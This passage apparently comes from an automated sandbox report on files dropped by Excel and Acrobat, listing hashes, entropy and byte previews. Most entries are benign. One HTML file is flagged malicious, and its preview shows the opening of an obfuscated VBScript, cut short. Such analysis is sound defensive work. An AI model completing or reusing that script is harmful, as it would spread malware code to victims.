              Encrypted:false
              SSDEEP:6144:Cg1ks74Ml+uTtCs8J064MJ3uGOE68J0GyF:L1ltcs0061JFh600Z
              MD5:B501C94C401EE82F4671223FBD9F7E0B
              SHA1:28C6F2571E8283808DE9BE456070F6F499583CD5
              SHA-256:403B7302E0C96EFA7851813F5E5F8AD8960425A176EB71C86D2A8749824A2CB4
              SHA-512:5808AD7623CE745433EC211C9BFF3598DFB2A60AA34E05657806DB305B9DE30851462EDBCB4DBF1B6D19D1F754968E563C26121A2891F85A937741F79EDE4649
              Malicious:false
              Preview:....l...............J................M.. EMF....@.$.~#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):34832
              Entropy (8bit):2.8884133288496865
              Encrypted:false
              SSDEEP:384:UCK6Royw05EBi9dI4Qv9jBNwpm0H76ATMFiD59nU:UbxBapFHmCOeXU
              MD5:A8CE562AAE2C9B81FB9BA866720D0FE8
              SHA1:61AC599AE270ECC900054777377BC0D339EA9ACB
              SHA-256:A79C856FFC5D9AA1821021123DBBFFD41249CF6CCE255A15CEB9E2CFB2730A31
              SHA-512:2042027B86A1CB09266D8D43CA5AE63AF5ADC7418D5580C53C1DC13E4256EFF2B9A7AFA3D547833E78D611B5AD085BD9F449BEC778522EF1825F79C7A22C8B1E
              Malicious:false
              Preview:....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):112400
              Entropy (8bit):3.611590161309178
              Encrypted:false
              SSDEEP:384:GgFFu9i+mE/ANOGpimKfV58CPDXGN/pMN89QmPPRsRDtSZxUHos:XFFFA5mMN89QFOeIs
              MD5:B4845D918E380C42E37B63C24AC1554A
              SHA1:950380B8A365F869777463634A63AB293B36F0BB
              SHA-256:1908C2F4E27CA37FFC7DB54BF0B86ED42F2CE80BADAEB5EAB0CF7450F8C13E66
              SHA-512:F2F387CBA66957BE493D98D8EDBF48E75B07BE0B01605DF9446E6DC058A59BDC8BCDF758EC98075AD3028F9FC67840A23C549061202E98786147C0A7D078D355
              Malicious:false
              Preview:....l...............X............/..ON.. EMF........\.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...R...p..................................0t....................................................................................@........$..8b..o/.8b...y...o/.........8b.........a%.h..y......8b.....$.y.N.o/p.y..yo/.....mo/..y...........b...y.......y.....,.y...o/.....8b...y.(.y..o/L.y...........................................................vp.y.
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2366784
              Entropy (8bit):2.5702042031546672
              Encrypted:false
              SSDEEP:6144:Cg1ks74Ml+uTtCs8J064MJ3uGOE68J0GyF:L1ltcs0061JFh600Z
              MD5:B501C94C401EE82F4671223FBD9F7E0B
              SHA1:28C6F2571E8283808DE9BE456070F6F499583CD5
              SHA-256:403B7302E0C96EFA7851813F5E5F8AD8960425A176EB71C86D2A8749824A2CB4
              SHA-512:5808AD7623CE745433EC211C9BFF3598DFB2A60AA34E05657806DB305B9DE30851462EDBCB4DBF1B6D19D1F754968E563C26121A2891F85A937741F79EDE4649
              Malicious:false
              Preview:....l...............J................M.. EMF....@.$.~#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):112400
              Entropy (8bit):3.611590161309178
              Encrypted:false
              SSDEEP:384:GgFFu9i+mE/ANOGpimKfV58CPDXGN/pMN89QmPPRsRDtSZxUHos:XFFFA5mMN89QFOeIs
              MD5:B4845D918E380C42E37B63C24AC1554A
              SHA1:950380B8A365F869777463634A63AB293B36F0BB
              SHA-256:1908C2F4E27CA37FFC7DB54BF0B86ED42F2CE80BADAEB5EAB0CF7450F8C13E66
              SHA-512:F2F387CBA66957BE493D98D8EDBF48E75B07BE0B01605DF9446E6DC058A59BDC8BCDF758EC98075AD3028F9FC67840A23C549061202E98786147C0A7D078D355
              Malicious:false
              Preview:....l...............X............/..ON.. EMF........\.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...R...p..................................0t....................................................................................@........$..8b..o/.8b...y...o/.........8b.........a%.h..y......8b.....$.y.N.o/p.y..yo/.....mo/..y...........b...y.......y.....,.y...o/.....8b...y.(.y..o/L.y...........................................................vp.y.
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):1881088
              Entropy (8bit):1.7164791949730298
              Encrypted:false
              SSDEEP:3072:as74MwNuo/yiO9r5e+8J2dvRRvMdaux/ZiOE85e+8J2dvRcvMy2:as74MwNuKO9l8J0LuGOE68J0p
              MD5:3AB0303100D7D14C542E517CD4C32094
              SHA1:21A6C3668E422566CB5D7B7B6E5FDEB36E6C5117
              SHA-256:7F20811F43A5F97F6B6AE4D43A8EF75FB83A14E529D27F61AFB81A24A4DA5D6A
              SHA-512:378FBED6E32DC8F6D9FFE625AED495318479656F4CA392C1345FF14E7363956CC72867005A3B810FD0CBCECEFEE23EDB6A2101B2A1708C06D7876ECDA0153F04
              Malicious:false
              Preview:....l...............r............C...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2365460
              Entropy (8bit):2.5701170235340203
              Encrypted:false
              SSDEEP:6144:1g1hs74MsTuW6JB8J0v4MJ+uGOE68J0LyB:d1s5oB00v1JQh600C
              MD5:D25476628CF0A6DCDD1D160C6E659FC1
              SHA1:9FD097FE50CB049922D2479520460853B18592F3
              SHA-256:DF8E3AFEF4DC6FF2F4C9A7B49BF9C5C9C45240FE2359618039EB6002AF771B3B
              SHA-512:F83707D20AA3F5BCDFD4C7263352614203D6C63B715AFB421DF623E6259C2B7B6688E210710E3986AA78BE0F92B22BD7B1F29E814B4DE80781F899BECF49EA1A
              Malicious:false
              Preview:....l...............J................M.. EMF......$.B#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):884312
              Entropy (8bit):1.2944965349348616
              Encrypted:false
              SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
              MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
              SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
              SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
              SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
              Malicious:false
              Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2366784
              Entropy (8bit):2.5702042031546672
              Encrypted:false
              SSDEEP:6144:Cg1ks74Ml+uTtCs8J064MJ3uGOE68J0GyF:L1ltcs0061JFh600Z
              MD5:B501C94C401EE82F4671223FBD9F7E0B
              SHA1:28C6F2571E8283808DE9BE456070F6F499583CD5
              SHA-256:403B7302E0C96EFA7851813F5E5F8AD8960425A176EB71C86D2A8749824A2CB4
              SHA-512:5808AD7623CE745433EC211C9BFF3598DFB2A60AA34E05657806DB305B9DE30851462EDBCB4DBF1B6D19D1F754968E563C26121A2891F85A937741F79EDE4649
              Malicious:false
              Preview:....l...............J................M.. EMF....@.$.~#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):1881088
              Entropy (8bit):1.7164791949730298
              Encrypted:false
              SSDEEP:3072:as74MwNuo/yiO9r5e+8J2dvRRvMdaux/ZiOE85e+8J2dvRcvMy2:as74MwNuKO9l8J0LuGOE68J0p
              MD5:3AB0303100D7D14C542E517CD4C32094
              SHA1:21A6C3668E422566CB5D7B7B6E5FDEB36E6C5117
              SHA-256:7F20811F43A5F97F6B6AE4D43A8EF75FB83A14E529D27F61AFB81A24A4DA5D6A
              SHA-512:378FBED6E32DC8F6D9FFE625AED495318479656F4CA392C1345FF14E7363956CC72867005A3B810FD0CBCECEFEE23EDB6A2101B2A1708C06D7876ECDA0153F04
              Malicious:false
              Preview:....l...............r............C...a.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):45556
              Entropy (8bit):3.2389256176191146
              Encrypted:false
              SSDEEP:384:IAB0utfMq2/aXmD7YsZgyXrHUpNDEk1Y6iJV6smkgjYx16U+z0pdkblo3OhG+U:7Uq2/JjZgyrH+Xs6UaAdelo+C
              MD5:65103012FD0D90B64E04605779EBA439
              SHA1:E28FEF0979669A7CA78C0B17E21B551E361EF85E
              SHA-256:40DE1766B2589303FF3F0C27D6CA82A28EE5A6576B7F38BEEBA017E777881CCF
              SHA-512:E02F05C6C0AE825A2074AC3EF1C48BE527A239CB898D27EC8F6B4B6543B95C9FD0F7F1249C08EAC52AC3F7C1036E2F9D5EE73F7B3465C17AFE7E5390845F040D
              Malicious:false
              Preview:................g...g...........O-..O-.. EMF................:...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...3. .(.2.4.0.5.5.4.6.,. .2.0.1.8.-.0.3.-.1.1.)...B.o.t.t.o.m. .c.o.r.n.e.r...e.m.f...................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...%...Drawing=438.1x436.0px, 115.9x115.4mm................................................................'...............0.......%...........;...............Z...+.......4.......................,......./.......`...u.......4.......................~...W.......P.......P.......4...........................P...B.......B...........4.......................B...#.......J.......J.......4...........................J...s...D...Z...+...=...........................4...............................{...................4...........................z.......i.......i.......4.......................G...i...t.......G...........4.......................%...;.......K...........=..............."...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2365700
              Entropy (8bit):2.5701824481641133
              Encrypted:false
              SSDEEP:6144:+c1ks74Ml+uTtCs8J0x4MJRuGOE68J0/guV:D1ltcs00x1Jfh600X
              MD5:49DFE0AC24D1641ED3C400105E7E6F8C
              SHA1:3FC4E030DBF5B0B99633BFECE5F406BD5AABFD56
              SHA-256:15C1364849E4F0092A8EA2870F90F1208DA0608C89F3B9450B9A9E0E9B43FB8A
              SHA-512:18CE2B090C61C7D78121F33B81F91F5BF27FF92EDC9E2491976A30714044B5EF09F2A41EFAD3CCF8829EC7762BB62D1AF4ED4B9087C043EB9EC55313C4B8EB56
              Malicious:false
              Preview:....l...............J................M.. EMF......$.V#..'.......................S....................*..U"..F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........!......."...........!......."...........................!.......%.......................................................................%...........%...........K..............."...........!.......................................................K..............."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...................................L...d...............F...............6...!..............?...........?................................'.......................%...........(.......................L...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):2365352
              Entropy (8bit):2.577190770978393
              Encrypted:false
              SSDEEP:6144:es74M+hu4IXH8J0L4MX4uGOE68J0zvqfaiPH:l1+p4H00L1X6h600Q
              MD5:4EDEB3C4D225A58140995AB4B19115A2
              SHA1:459BF4A7B2C3FADA7F967E0B0B9AC54F25D813A3
              SHA-256:DCFC06483474D9E634B5E651E7A2A33A382D81E02E979682E48E23FC85D7E54C
              SHA-512:F5B23F49D7E278B0BF4C23006F3D82080979465DB556A58FC860A9AB359B77C5520FAD6A8B05E37E61517C66316586A0D33473666CFE7A70BE9C7831744F848C
              Malicious:false
              Preview:....l...........k...k...............@.. EMF......$..#..$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l......."...........!...............................................l.......'.......................%...........................................................L...d...........#...X...........$...C...!..............?...........?................................'.......................%...........(.......................L...d...#.......k...X...#.......I...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):884312
              Entropy (8bit):1.2944965349348616
              Encrypted:false
              SSDEEP:1536:W3dki8JungPuzcn6F1Tny9Cie/koPs9h9RHJFUrnT15vWP5cPpmJ2dvRaQq3vMog:Hux/ZiOE85e+8J2dvRcvMyw
              MD5:9ABE7EB352E0DB96B52C99AC2FDEA85F
              SHA1:8DC45D02308275BA32B7FFB320A3042256D40C8B
              SHA-256:EC022DFF1CC8251BA9D849C16431914635473FC5457AE73AA277651B47948869
              SHA-512:E43325B927F5365F16118B67E1830B2A0E8CC051D9AEAB144DA6A75751CA39CC1831158270A50ED31BCCBA29C98A56769E516F36C45CB5FAA1BB6ED92CC0A5EB
              Malicious:false
              Preview:....l............................2...... EMF....X~..........................8...X....................?...........................................2......................Q....}..........................................P...(...x...$}...... ....2......(...................$}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
              Category:dropped
              Size (bytes):34832
              Entropy (8bit):2.8884133288496865
              Encrypted:false
              SSDEEP:384:UCK6Royw05EBi9dI4Qv9jBNwpm0H76ATMFiD59nU:UbxBapFHmCOeXU
              MD5:A8CE562AAE2C9B81FB9BA866720D0FE8
              SHA1:61AC599AE270ECC900054777377BC0D339EA9ACB
              SHA-256:A79C856FFC5D9AA1821021123DBBFFD41249CF6CCE255A15CEB9E2CFB2730A31
              SHA-512:2042027B86A1CB09266D8D43CA5AE63AF5ADC7418D5580C53C1DC13E4256EFF2B9A7AFA3D547833E78D611B5AD085BD9F449BEC778522EF1825F79C7A22C8B1E
              Malicious:false
              Preview:....l...........B...............!?..3X.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:HTML document, ASCII text, with very long lines (8772), with CRLF line terminators
              Category:dropped
              Size (bytes):8898
              Entropy (8bit):2.899633905074514
              Encrypted:false
              SSDEEP:48:3EsYcJaFxYcJeMilzHIM7py4U2b6poz10daCa/b9:0LfgtlzF82bPpT9
              MD5:0D80023F01F54FA272B5E479939931D2
              SHA1:51E7B1B40CCCF70D60824AC128FC5AB64BB6A2F2
              SHA-256:5DAD7712C6DBDF9E9931941ABE2E02A0C8DCBE93802CD317CE96A2D95D4DC653
              SHA-512:73FB549F3485CF4E7856E2A326283D9199462026ED918F445EAF9EACEDCA101988598DB54134D379486D23831801AC0554252CE3D6B359C75CB1F672945948DD
              Malicious:true
              Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRIpT tyPe="tEXT/VbScrIpt">..DIm.....................................................................................................................................................................................................................................TUzkrgqBknbtbVQXNIcXRvgdMbxOKmWpBOuVZPzxfxOfXSarEhOplYnjMcthreajAWMAlWBavFUYJDgljBcoVTGVgjlVafReLGKBypgjeaBBHRRHyfZxqVSpPJjGgddadhwAgJUbZXRonwNFshOsRSEt.....................................................................................................................................................................................................................................,.....................................................................................................................................................................................................................................XcGKIdpOALZNyrWVtLJpFgBRXseCYmd
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):2.7129194926077287
              Encrypted:false
              SSDEEP:24:YIrNvpCHhFGMfzLRwcftR/8AJp9WtAZRJ5poIHWPZqy:YmbCHaMfzLmcL8AJtfJ52IH2Zh
              MD5:AEA8676011F651E962233964C56EC078
              SHA1:48A16B5ED64B901BD474918730E8428101BCB382
              SHA-256:F66BFE3FB3CF9C5973527B3C6ED0927D4056DADF962D0B64B87FD97F852191F9
              SHA-512:76ED966584166233A500D2400C012929DC76D1DFF397C3A3D014FB7ECE767730966655974A3B1BE5B6E0C03CC21B3A38B3029916628DCC07D07CC1A8F7031748
              Malicious:false
              Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.3.7.4.6.2.5.9.,.1.2.2.3.4.3.4.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.8.7.4.7.0.1.5.3.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.3.7.4.6.3.7.9.,.1.9.8.4.4.3.5.,.6.1.7.0.7.3.0.5.,.3.1.4.1.5.9.2.0.,.
              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              File Type:ASCII text, with very long lines (393)
              Category:dropped
              Size (bytes):16525
              Entropy (8bit):5.376360055978702
              Encrypted:false
              SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
              MD5:1336667A75083BF81E2632FABAA88B67
              SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
              SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
              SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
              Malicious:false
              Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              File Type:ASCII text, with very long lines (392), with CRLF line terminators
              Category:dropped
              Size (bytes):16577
              Entropy (8bit):5.363417736081027
              Encrypted:false
              SSDEEP:384:xHh2JD1Dit4e9zvVN6lsjbuP/Q9HBd7dLd5sNTYT1y7yhy5ybymw5wuwA5J6IGGU:SIdX
              MD5:99FBE203A9EE42290D7FAE927450F75B
              SHA1:0425DDC4C9C7876AE753FDA637ADE7F1D6BFC1AE
              SHA-256:EF272822298B124759560CD349C9C986BF5B192A5342746A49F4C4FAFEEA0DE3
              SHA-512:EB9912F754EF531774E52E687733DD14B201B02377AEC3F5FBDC17DBF78700AABDD16961533D19276980AE56337E5652B070269C3F19383B148B1D32A2212AC0
              Malicious:false
              Preview:SessionID=5d335403-1b58-439f-b8f6-8e52f64811af.1734704537823 Timestamp=2024-12-20T09:22:17:823-0500 ThreadID=5700 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5d335403-1b58-439f-b8f6-8e52f64811af.1734704537823 Timestamp=2024-12-20T09:22:17:824-0500 ThreadID=5700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5d335403-1b58-439f-b8f6-8e52f64811af.1734704537823 Timestamp=2024-12-20T09:22:17:824-0500 ThreadID=5700 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5d335403-1b58-439f-b8f6-8e52f64811af.1734704537823 Timestamp=2024-12-20T09:22:17:824-0500 ThreadID=5700 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5d335403-1b58-439f-b8f6-8e52f64811af.1734704537823 Timestamp=2024-12-20T09:22:17:824-0500 ThreadID=5700 Component=ngl-lib_NglAppLib Description="SetConf
              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):29845
              Entropy (8bit):5.394549184126406
              Encrypted:false
              SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbk:Y
              MD5:1EDB374D9105980540883E5F9EA94B63
              SHA1:541CC5BEDF04E983594BFC0A5E2D71EFF705A458
              SHA-256:7667A5D1E74C478AAB99E6FBB28DA8DF140EE60F56188E95CF14193CFBF7B34B
              SHA-512:720C9B3584D4EAE62DDD4B3F41500A46578943184F81413FC01935D688D846EF411D4172DFA763A4300127341946198C8A8042D74D92F57473A13C754F69D9E2
              Malicious:false
              Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):364544
              Entropy (8bit):5.44260202777173
              Encrypted:false
              SSDEEP:6144:2k3hbdlylKsgwyzcTbWhZFVE+W2Nn0RopkmhSwdfwVmefXN2gJgpgiV9PZ6:4Ro+aBfwVmefX0ygphV9B
              MD5:4A43A67B9A9AC717F8F13FD11D34AD2E
              SHA1:670D236741D4EE958D7E635012DA2F9FFCBE7A06
              SHA-256:AD291DCE3FA7799A924C8EA54FB62E4151520E220CF7EDAFEDCB1E18C37F6888
              SHA-512:6F9AF06DE0B4CBEC38A2C4DD16BF6BD7B561FB40EC828B97F87CF0FA92784C978518545B521157399886AE816E4E77E4478C80F75EB1A75AE6779C8997352490
              Malicious:false
              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:BF619EAC0CDF3F68D496EA9344137E8B
              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
              Malicious:false
              Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):512
              Entropy (8bit):0.0
              Encrypted:false
